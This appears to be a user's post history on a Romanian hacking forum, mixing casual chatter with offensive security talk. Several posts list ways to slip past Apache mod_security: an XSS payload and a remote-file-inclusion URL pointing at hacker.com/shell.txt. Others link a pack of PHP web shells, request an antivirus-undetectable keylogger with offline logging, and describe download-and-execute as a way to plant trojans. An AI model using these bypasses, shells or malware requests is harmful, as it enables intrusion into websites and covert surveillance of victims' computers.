moubik
-
Posts
1261 -
Joined
-
Last visited
-
Days Won
1
Everything posted by moubik
-
unii beau, altii fumeaza...
-
scuze, bankai. ai dreptate
-
ti-as da warn daca as putea. closed, trashed.
-
ambele acum am timp. apropo, si din datorita tie am avatarul ala! asa ca sa nu comentezi prea mult apropo, mai vorbisem noi o data de alta idee de proiect. care nu tinea de win32. facem aia ?
-
scuza-ma dar am gresit atunci cand am spus ca nu exista move la ftp. ai comenzile: rnfr - rename from rnto - rename to si ca exemplu vrei sa muti fisierul arhiva.zip in directorul carti rnfr arhiva.zip rnto carti/arhiva.zip
-
mama voastra de nebuni... pe mine de ce nu ma puneti sa lucrez la ceva daca aveti idei ?!
-
scuze, slick. intradevar nu verificasem. am presupus ca e aceeasi versiune. http://websecurity.ro/downloads/GWS.rar (updated)
-
si eu am avut mici probleme. l-am hostat si eu aici: [old link] EDIT by SlicK
-
sau iti cumperi rstzone.ro si iti faci acolo.
-
nu am configurat niciodata un mod_secure pentru apache. din cate am citit, i se creaza niste reguli pe baza carora blocheaza request-urile. as vrea sa facem o lista cu ce blocheaza de obicei (lista default), si cum sa trecem de acestea. cand blocheaza mod_secure apare o pagina in genul acesta: blocheaza: -request-rile /etc/passwd si toate de genul ../../../etc/passwd - nu stiu cum sa bypass asta - <script>alert(1)</script> # se poate face bypass cu <img=http:// onerror="alert(1)"> -daca sunt 2 "?" in url stim ca asta apare atunci cand incercam sa facem un rfi, si astfel url-ul arata in genul: http://www.vulnerable.com/index.php?page=http://hacker.com/shell.txt? # asteia ii fac bypass cu un script php ce foloseste doar POST, in loc de GET
-
ai dreptate, dar daca site-ul nu salveaza cookie, si foloseste doar sesiune poti sa folosesti asta.
-
comportament adecvat unui administrator ?
-
there is no cow level. ... ... shit, that didn't work. daca ai ceva sa-mi spui, vezi ca am id-ul de Y! public...
-
1) nu stiu 2) da, am incercat. tot trebuie sa faca autocomplete de la ceva, si nu merge. 3) $_SESSION[] identifica variabilele salvate pe server, dar $_COOKIE['PHPSESSID'] spune serverului ce set de variabile sa foloseasca din ce are salvat.
-
nu inteleg problema ta. observ ca te deranjeaza ceva, dar nu inteleg.
-
tscc, daca ai fi cautat pe net ai fi vazut ca este un codec oferit de camtasia. techsmith screen capture codec. sunt multe variante prin care sa poti vedea filmul. eu folosesc 1 singur player pentru toate filmele, si pentru toate formatele. are suport pentru subtitrari, poate vedea prin streaming, poate reencoda, poate face ripping la streamuri, are codecuri incluse. va prezint: kmplayer (nu are legatura cu player-ul pentru linux mplayer)
-
O anumita institutie vrea sa-si intareasca sistemul de securitate pe site-ul propriu. Din pacate nu stiu pe nici un om care sa indeplineasca cerintele lor minimale. Pot sa le fac o oferta in numele unei firme destul de cunoscute in romania(cea la care lucrez), insa nu indeplinesc aceste conditii minimale si nici nu stiu persoane care sa stie securitate si sa le aiba. voi ?
-
ahahaha, ce tare, pastilatule!
-
sincer nu pot sa va spun cat de safe sunt shell-urile (adica daca sunt infectate cu ceva scripts sau nu) poate va dati voi seama. 24 de php shells: http://websecurity.ro/downloads/shell%20pack.zip
-
din pacate dupa maxim 2 zile o sa il vada... ras, nu neaparat, ca stiu ca am testat versiunea precedenta la cateva saptamani si inca nu era detectabil de nod32 @yonyx:te-am intrebat de offline keylogging pentru ca stiu ca versiunea precedenta nu continea asta. decat versiunea pro ziceai ca are
-
in perl nu se compileaza. fiind un limbaj de scripting se ruleaza direct folosind interpretorul.
-
eu am incercat doar butonul "test"
-
downloadeaza si executa automat un program. asta se poate folosi ca o metoda pentru a instala un trojan sau un program pe calculatorul cuiva. de obicei aceste programe sunt foarte micutze si acest lucru poate prezenta un avantaj
-
vreau o versiune nedetectabila cu offline keylogging te rog ... putem discuta pe privat.
-
am folosit phpids o perioada si imi bloca multe request-uri la care ar fi trebuit sa am acces de fapt. de exemplu daca modifici printr-un front-end o pagina html sau o pagina php nu te lasa.